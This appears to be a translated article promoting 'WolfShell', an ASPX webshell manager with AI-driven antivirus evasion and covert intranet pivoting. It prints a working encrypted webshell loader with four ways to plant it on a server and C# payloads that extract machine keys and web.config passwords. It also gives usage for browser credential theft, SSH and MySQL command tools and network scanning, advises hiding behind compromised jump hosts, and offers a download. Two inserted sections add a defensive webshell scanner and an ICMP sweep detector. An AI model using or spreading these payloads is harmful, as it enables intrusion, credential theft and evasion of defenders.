The first WebShell management tool with AI-assisted penetration: chat to get AV evasion | high-stealth intranet penetration
0x01 Tool introduction

Wolverine (金刚狼, WolfShell) is the first WebShell MCP with AI penetration support, and also an advanced ASPX/ASHX WebShell management tool that supports multi-layer intranet cascading. The tool uses AES-encrypted communication, reaches into the intranet without deploying a proxy, and supports loading all kinds of penetration tools in memory, so nothing is written to disk on the target. It also provides dynamic code execution, shellcode loading, reverse shell, SOCKS proxy and in-memory webshell (内存马) injection; a chat session is enough to get AV evasion. It greatly improves stealth and post-exploitation capability and is aimed at intranet security testing and lateral-movement work in high-adversary environments. The download link is at the end.

0x02 Features

Main features:

- Custom .NET program execution: load and run custom .NET assemblies in memory to extend post-exploitation capability quickly.
- AI: use AI to make the Wolverine WebShell server side evade AV.
- Cascaded intranet, layer 3: the WebShell executes cmd commands. Through the entry point 192.168.50.106, cascade to the intranet host 192.168.50.159, then cascade again to the next-layer intranet host 192.168.50.69 and execute commands on that WebShell. PS: you can also cascade through external hosts, for example by using a few compromised servers as jump hosts while the real target sits at layer 3; that makes it very hard to trace or attribute your real IP.
- Cascaded intranet, layer 2: through the entry point 192.168.50.159, cascade to the intranet host 192.168.50.106 and execute commands on its WebShell.
- WebShell entry point: execute cmd commands.
- WebShell entry point: execute PowerShell commands/code. whoami is implemented in code, not the system whoami. Supports command execution and code execution up to 9K in length. Enter info or ver to see the OS version, bitness, .NET version and PowerShell version. Entering whoami or username is automatically converted into the corresponding PowerShell code to show user information. Base64-encoded code execution, example: base64:ZWNobyBXb2xmU2hlbGw

    PS C:\Users\admin> whoami
    whoami: IIS APPPOOL\DefaultAppPool
    Username: WIN-021V7TK43N5$
    PS C:\Users\admin> info
    Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
    Version Number: 10.0.17763
    PowerShell Version: 5.1.17763.1
    .NET Detailed Versions:
    PSChildName Version   Release
    ----------- -------   -------
    Client      4.7.03190 461814
    PS C:\Users\admin> base64:ZWNobyBXb2xmU2hlbGw
    WolfShell
    PS C:\Users\admin> Write-Host "Current User:`n$env:USERNAME"
    Current User:
    WIN-021V7TK43N5$

- File management.

Core advantages:

- AI penetration support: direct the AI in natural language to operate the WebShell and run commands.
- AI evasion: connect an AI and a chat session is enough to make the WebShell evade AV.
- Efficient, covert communication: a binary-stream transport protocol keeps communication efficient and hard to spot.
- End-to-end encryption: every transmitted payload is AES-encrypted, and each communication uses a random key.
- Traceless operation: code is loaded and executed directly in memory, leaving as few traces on disk as possible.
- Cascaded intranet WebShell control: through an already-controlled WebShell, connect to and control WebShells deeper in the intranet without deploying a proxy or configuring port forwarding.
- Hacking post-exploitation: load penetration tools in memory through the controlled WebShell, again without a proxy or port forwarding, for convenient lateral movement inside the intranet.
- Language characteristics: the server side (webshell) and the payloads are pure English; only the supplied WebShell variant files contain English, Japanese and Korean.

0x03 Update notes

- Built-in web site detection (memory-loaded EXE scanner)
- Built-in port scanning (memory-loaded EXE scanner)
- Built-in PJL protocol printer detection (memory-loaded EXE scanner)
- Built-in SNMP network-device detection

0x04 Usage

Installation guide:

1. Download WolfShell.
2. Configure the environment: make sure the target environment supports ASPX/ASHX and is configured correctly.
3. Upload WolfShell: upload the WolfShell file to the target server. Three types are supported: ASPX, ASHX and in-memory webshell. WebShell script: shell
4. Access the WebShell: connect to the WebShell with the tool's client. The default password is WolfShell; to change it, use the WolfHash encryption built into the tool.

Environment: operating system Windows; .NET version .NET Framework 4.8.

Command execution | vulnerability GetShell

When command execution is available, the Wolverine WebShell can be written with the following 4 methods.

    # PowerShell: write wolf.aspx
    powershell -Command "Set-Content -Path wolf.aspx -Value '<%@ Page Language=\"C#\" %><% if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); } %>'"

    # PowerShell command, Base64-encoded: write wolf.aspx
    powershell -EncodedCommand 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

    # cmd: echo + certutil write wolf.aspx
    echo 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 > w.hex
    certutil -f -decodehex w.hex wolf.aspx
    del w.hex

    # cmd: echo write wolf.aspx
    echo ^<%@ Page Language="C#" %^> > wolf.aspx
    echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx
    echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx
    echo System.IO.Stream s = Request.InputStream; >> wolf.aspx
    echo byte[] c = new byte[s.Length]; >> wolf.aspx
    echo s.Read(c, 0, c.Length); >> wolf.aspx
    echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx
    echo } %^> >> wolf.aspx

C# code execution: sample code to obtain the ValidationKey

ValidationKey extraction: reads the ValidationKey, Validation, DecryptionKey and the other values needed for ViewState deserialization.

    using System;
    using System.Reflection;
    using System.Web.Configuration;

    public class Eval
    {
        public string eval(Object obj)
        {
            // Load System.Web and reach the non-public MachineKeySection accessor by reflection.
            var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
            var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
            var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
            var cg = (MachineKeySection)gac.Invoke(null, new object[0]);
            return "ValidationKey: " + cg.ValidationKey + " | Validation: " + cg.Validation
                 + " | DecryptionKey: " + cg.DecryptionKey + " | Decryption: " + cg.Decryption
                 + " | CompatibilityMode: " + cg.CompatibilityMode;
        }
    }

Scan a C-segment for live hosts: sample code

    using System;
    using System.Net;
    using System.Net.NetworkInformation;
    using System.Text;
    using System.Threading.Tasks;

    public class Eval
    {
        public string eval(Object obj)
        {
            StringBuilder iplist = new StringBuilder();
            string baseIP = "192.168.1.";
            PingOptions options = new PingOptions();
            options.DontFragment = true;
            // One ping task per host in the /24, 120 ms timeout each.
            var tasks = new Task[254];
            for (int i = 1; i < 255; i++)
            {
                int ipSuffix = i;
                tasks[i - 1] = Task.Run(() =>
                {
                    using (Ping myPing = new Ping())
                    {
                        PingReply reply = myPing.Send(baseIP + ipSuffix, 120);
                        if (reply.Status == IPStatus.Success)
                        {
                            lock (iplist)
                            {
                                iplist.AppendLine("Alive IP: " + reply.Address.ToString());
                            }
                        }
                    }
                });
            }
            Task.WaitAll(tasks);
            return iplist.ToString();
        }
    }

CMD command execution: sample code

    using System;
    using System.Diagnostics;

    public class Eval
    {
        public string eval(Object obj)
        {
            try
            {
                Process process = new Process();
                process.StartInfo.FileName = "cmd.exe";
                process.StartInfo.Arguments = "/c whoami";
                process.StartInfo.UseShellExecute = false;
                process.StartInfo.RedirectStandardOutput = true;
                process.Start();
                string result = process.StandardOutput.ReadToEnd();
                process.WaitForExit();
                return result;
            }
            catch (Exception ex)
            {
                return "Error occurred: " + ex.Message;
            }
        }
    }

Read passwords from web.config: sample code

web.config read: extracts database connection information (database name, user, password), SMTP/mail server credentials and similar settings.

    using System;
    using System.Configuration;
    using System.Text;

    public class Eval
    {
        public string eval(Object obj)
        {
            try
            {
                var connectionStrings = ConfigurationManager.ConnectionStrings;
                var appSettings = ConfigurationManager.AppSettings;
                var result = new StringBuilder();
                foreach (ConnectionStringSettings connectionString in connectionStrings)
                {
                    result.AppendLine("Connection string name: " + connectionString.Name);
                    result.AppendLine("Connection string value: " + connectionString.ConnectionString);
                    result.AppendLine();
                }
                result.AppendLine();
                foreach (string key in appSettings.AllKeys)
                {
                    result.AppendLine("Key: " + key + ", Value: " + appSettings[key]);
                }
                return result.ToString();
            }
            catch (Exception ex)
            {
                return "Error occurred: " + ex.Message;
            }
        }
    }

Encryption/decryption algorithms

Supported encoding/hash algorithms: BASE64, HEX, ASCII, PowerShell, MD5, SHA1, SHA256, URL encoding.
Supported decoding algorithms: BASE64, HEX, ASCII, PowerShell, URL encoding.
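From the defender's side, the four write methods above all end with the same short ASPX loader on disk: it reads the raw POST body, AES-decrypts it with a key hard-coded in the page, hands the plaintext to Assembly.Load and instantiates a class from it. That shape is a better detection handle than any single string, because the author can change the key or the class name but not the mechanism. The following content scanner is an added example written for this page; it is not part of WolfShell or the article. It scores .aspx/.ashx files against weighted indicators derived from the wolf.aspx sample above (the key value ca63457538b9b1e0 is the one shown on the page and is included only as a low-cost IoC), and the two sample file bodies are constructed here for the demonstration.

```python
"""Content-signature scan for the in-memory AES loader shape shown in the wolf.aspx sample."""
import re
from pathlib import Path

# (label, regex over the file text, weight). The first five indicators together
# describe the loader mechanism; the last is the hard-coded key from the page's
# sample, which is trivially changed and therefore carries only a small weight.
INDICATORS = [
    ("raw POST body read",           r"Request\.InputStream", 2),
    ("AES/Rijndael provider",        r"RijndaelManaged|AesCryptoServiceProvider|Aes\.Create\s*\(", 2),
    ("decryptor built in page code", r"CreateDecryptor\s*\(", 2),
    ("assembly loaded from bytes",   r"Assembly\.Load\s*\(", 3),
    ("short class name instantiated", r'CreateInstance\s*\(\s*"[^"]{1,8}"\s*\)', 2),
    ("single-block decrypt",         r"TransformFinalBlock\s*\(", 1),
    ("cookie-presence gate",         r"Request\.Cookies\.Count\s*!=\s*0", 1),
    ("key from the page's sample",   r"ca63457538b9b1e0", 2),
]
THRESHOLD = 7  # Assembly.Load alone is legitimate; it needs the decrypt-and-read context around it.


def score_text(text):
    """Return (score, [matched labels]) for one file body."""
    score, hits = 0, []
    for label, pattern, weight in INDICATORS:
        if re.search(pattern, text):
            score += weight
            hits.append(label)
    return score, hits


def is_suspicious(text):
    return score_text(text)[0] >= THRESHOLD


def scan_texts(named_texts):
    """Score an in-memory {name: text} mapping; return {name: (score, hits)} at or above THRESHOLD."""
    findings = {}
    for name, text in named_texts.items():
        score, hits = score_text(text)
        if score >= THRESHOLD:
            findings[name] = (score, hits)
    return findings


def scan_webroot(root):
    """Walk an IIS web root and score every ASP.NET page-like file."""
    exts = {".aspx", ".ashx", ".asax", ".ascx", ".asmx"}
    files = {str(p): p.read_text(encoding="utf-8", errors="replace")
             for p in Path(root).rglob("*") if p.is_file() and p.suffix.lower() in exts}
    return scan_texts(files)


# Constructed samples: the loader shape quoted on the page, and a benign page.
SAMPLE_SHELL = (
    '<%@ Page Language="C#" %><% if (Request.Cookies.Count != 0) { '
    'byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); '
    'System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); '
    'System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged()'
    '.CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); } %>'
)
SAMPLE_BENIGN = '<%@ Page Language="C#" %><html><body><% Response.Write(DateTime.Now); %></body></html>'

if __name__ == "__main__":
    for name, (score, hits) in scan_texts({"wolf.aspx": SAMPLE_SHELL, "default.aspx": SAMPLE_BENIGN}).items():
        print(name, score, hits)
```

The scanner is deliberately file-content only, so it also catches copies written via certutil -decodehex or a chain of echo lines; pair it with file-integrity monitoring of the web root, because a brand-new .aspx created by the w3wp.exe process (which is what every one of the four write methods produces when run through an existing command-execution bug) is itself a strong signal regardless of its content.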
Wolverine password

Potato privilege-escalation example: badpotato privilege escalation

Intranet scan example

Hacking post-exploitation

SSH remote command execution example

    Usage:
    sshcmd 192.168.50.128 22 root toor id
    sshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rar
    sshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rar
    Keyboard:
    sshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rar
    sshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar

MySQL database connection example

    mysqlcmd host port user pass dbname sqlstr
    mysqlcmd host port user pass dbname sqlb64
    Demo:
    mysqlcmd 192.168.50.139 3306 root WolfShell mysql info
    mysqlcmd 192.168.50.139 3306 root WolfShell mysql "SELECT VERSION();"
    mysqlcmd 192.168.50.139 3306 root WolfShell mysql "SELECT 3+5"
    mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==

Browser password reading example

SharpWeb is a browser credential grabber; it extracts saved Chrome, Firefox and Edge logins and credentials.

    Usage: SharWeb arg0 [arg1 arg2 ...]
    Arguments:
    all     - Retrieve all Chrome, FireFox and IE/Edge credentials.
    full    - The same as all
    chrome  - Fetch saved Chrome logins. e.g. -d Directory
    firefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directory
    edge    - Fetch saved Internet Explorer/Microsoft Edge logins.
    Demo:
    SharWeb all
    SharWeb chrome
    SharWeb chrome -d C:\Output
    SharWeb firefox -p mymasterkey -d C:\Output
    SharWeb edge

Ladon intranet penetration tool example

    Usage:
    Ladon whoami
    Ladon 192.168.50.159/24 ICMP       ICMP live-host discovery
    Ladon 192.168.50.159/24 PortScan   open port and service scan
    Ladon 192.168.50.159/24 WebScan    site titles and middleware
    Ladon 192.168.50.159/24 SmbInfo    SMB live hosts, NTLM system info
    Ladon 192.168.50.159/24 NbtInfo    NBT live hosts, NTLM system info
    Ladon 192.168.50.159/24 WmiInfo    WMI live hosts, NTLM system info
    Ladon 192.168.50.159/24 LdapInfo   LDAP live hosts, NTLM system info
    Ladon 192.168.50.159/24 RdpInfo    RDP live hosts, NTLM system info
    Ladon 192.168.50.159/24 SmtpInfo   SMTP live hosts, NTLM system info
    Ladon 192.168.50.159/24 HttpInfo   HTTP live hosts, NTLM system info
    Ladon 192.168.50.159/24 WinrmInfo  WinRM live hosts, NTLM system info
    Ladon 192.168.50.159/24 MssqlInfo  SQL Server hosts, NTLM system info
    Ladon 192.168.50.159/24 FtpInfo    FTP live hosts
    Ladon 192.168.50.159/24 T3Info     WebLogic T3 protocol detection
    Ladon 192.168.50.159/24 CiscoInfo  Cisco router detection
    Ladon 192.168.50.159/24 SnmpInfo   SNMP device detection (routers, switches, etc.)
    Ladon 192.168.50.159/24 OxidInfo   Windows multi-NIC host detection
    Ladon 192.168.50.159/24 EthInfo    Windows multi-NIC host detection
    Ladon http://0x7556.org WPinfo     WordPress version, plugin and vulnerability detection
    Ladon 192.168.50.159/24 DnsInfo    DNS live hosts, domain identification

Memory-loaded intranet scanner

With the memory-loading scanner you only need to develop a .NET program that handles a single IP; this module turns it into a memory-loaded C-segment scanner. This applies to any tool that only needs to check or exploit one IP at a time. Note: the class and the method must be Public.

Custom tool, original usage:

    F:\py>urltitle.exe 192.168.50.1
    URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title

Remote memory loading turns it into an intranet C-segment scanner. Usage:

1. Drag the target EXE into the "ExePath" file-path input box.
2. Enter the subnet to scan in the "C段" box, for example 192.168.1.0/24.
3. Click "Scan" to start. The scan behaviour and results are determined by the functionality of the loaded EXE.

Note: by default the loader first probes each target with an ICMP ping, and only hosts that respond get the custom EXE loaded and executed. If ICMP responses are disabled on the target network, untick the "先行探测/ICMP" option to skip the probe step.

Download: reply 20260326 to the public account to get the download.
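Ladon's ICMP discovery, the C# ping scanner earlier on the page and the memory loader's "probe first" step all produce the same network artifact: one source touching most of a /24 with ICMP echo requests in a short time. The detector below is an added example for this page, not part of WolfShell, Ladon or the article. It assumes a constructed key=value flow-log format (timestamp, src, dst, proto, ICMP type), which is not any particular product's format; it counts first-contact times per source and /24 so that a monitoring host pinging the same two gateways repeatedly is not mistaken for a sweep, and builds its own sample log inline.

```python
"""Flag ICMP echo sweeps of a /24 in flow-style firewall logs (constructed log format)."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
import ipaddress
import re

# Assumed line shape (constructed for this example):
#   2026-03-26T10:00:00Z src=192.168.50.106 dst=192.168.50.1 proto=ICMP type=8
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)"
    r"\s+proto=(?P<proto>\w+)(?:\s+type=(?P<type>\d+))?$"
)


def parse_line(line):
    """Return (timestamp, src, dst) for an ICMP echo-request line, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m["proto"].upper() != "ICMP" or m["type"] != "8":
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["dst"]


def detect_icmp_sweeps(lines, window_seconds=60, min_targets=20):
    """Return {src: [subnet, ...]} for sources that first-contacted at least
    min_targets distinct hosts of one /24 within any window_seconds interval."""
    first_seen = defaultdict(dict)  # (src, subnet) -> {dst: earliest timestamp}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dst = parsed
        subnet = str(ipaddress.ip_network(dst + "/24", strict=False))
        seen = first_seen[(src, subnet)]
        if dst not in seen or ts < seen[dst]:
            seen[dst] = ts

    alerts = defaultdict(list)
    window = timedelta(seconds=window_seconds)
    for (src, subnet), seen in first_seen.items():
        times = sorted(seen.values())
        left = 0
        for right in range(len(times)):  # two-pointer sliding window over first-contact times
            while times[right] - times[left] > window:
                left += 1
            if right - left + 1 >= min_targets:
                alerts[src].append(subnet)
                break
    return {src: sorted(subnets) for src, subnets in alerts.items()}


def build_sample_log():
    """Constructed sample: one host sweeps 192.168.50.1-40 in 40 s; a monitor pings two hosts repeatedly."""
    base = datetime(2026, 3, 26, 10, 0, 0, tzinfo=timezone.utc)
    fmt = lambda t: t.strftime("%Y-%m-%dT%H:%M:%SZ")
    lines = [f"{fmt(base + timedelta(seconds=i))} src=192.168.50.106 dst=192.168.50.{i} proto=ICMP type=8"
             for i in range(1, 41)]
    for i in range(10):
        t = fmt(base + timedelta(seconds=30 * i))
        lines.append(f"{t} src=192.168.50.20 dst=192.168.50.1 proto=ICMP type=8")
        lines.append(f"{t} src=192.168.50.20 dst=192.168.50.2 proto=ICMP type=8")
    lines.append(f"{fmt(base)} src=192.168.50.20 dst=192.168.50.3 proto=TCP")  # ignored: not ICMP
    return lines


if __name__ == "__main__":
    print(detect_icmp_sweeps(build_sample_log()))
```

Tune window_seconds and min_targets to the segment: the page's own C# scanner fires all 254 probes at once with a 120 ms timeout, so a 60 s window with 20 targets is generous. Because the loader has an option to skip the ICMP probe, treat this detector as one signal and keep an equivalent one on TCP SYN fan-out (PortScan, WebScan and the *Info modules) so that disabling ping does not also disable detection.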
This article was contributed by an internet user; the views expressed are the author's own and do not represent the position of this site. This site only provides information storage services, does not own the content and assumes no related legal responsibility. If you reproduce it, please cite the source: http://www.coloradmin.cn/o/2452389.html